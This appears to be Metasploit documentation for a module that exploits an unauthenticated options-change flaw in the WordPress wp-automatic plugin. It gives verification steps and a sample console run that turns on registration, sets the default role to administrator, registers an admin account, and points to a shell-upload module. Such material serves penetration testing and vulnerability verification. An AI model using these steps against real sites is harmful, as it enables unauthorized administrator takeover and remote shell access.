1.8 KiB
1.8 KiB
Vulnerable Application
This module exploits an unauthenticated arbitrary wordpress options change vulnerability in the Automatic (wp-automatic) plugin <= 3.53.2.
If WPEMAIL is provided, the administrator's email address will be changed.
User registration is enabled, and default user role is
set to administrator. A user is then created with the USER name set.
A valid EMAIL is required to get the registration email (not handled in MSF).
A vulnerable version of the plugin can be downloaded here
Verification Steps
- Install the vulnerable plugin
- Start msfconsole
- Do:
use auxiliary/admin/http/wp_automatic_plugin_privesc - Do:
set rhosts [IPs] - Do:
set email [email address] - Do:
run - You should get an email to setup your new admin account.
Options
Email for registration. No default.
USER
Username for registration, defaults to msfuser
WPEMAIL
Wordpress Administration Email. No default.
Scenarios
wp-automatic 3.50.7 on Wordpress 5.4.4 No WPEMAIL
resource (automatic.rb)> use auxiliary/admin/http/wp_automatic_plugin_privesc
[*] Using auxiliary/admin/http/wp_automatic_plugin_privesc
resource (automatic.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (automatic.rb)> set verbose true
verbose => true
resource (automatic.rb)> set email fake@example.com
email => fake@example.com
resource (automatic.rb)> run
[*] Running module against 1.1.1.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Enabling user registrations...
[*] Setting the default user role type to administrator...
[*] Registering msfuser with email fake@example.com
[+] For a shell: use exploits/unix/webapp/wp_admin_shell_upload
[*] Auxiliary module execution completed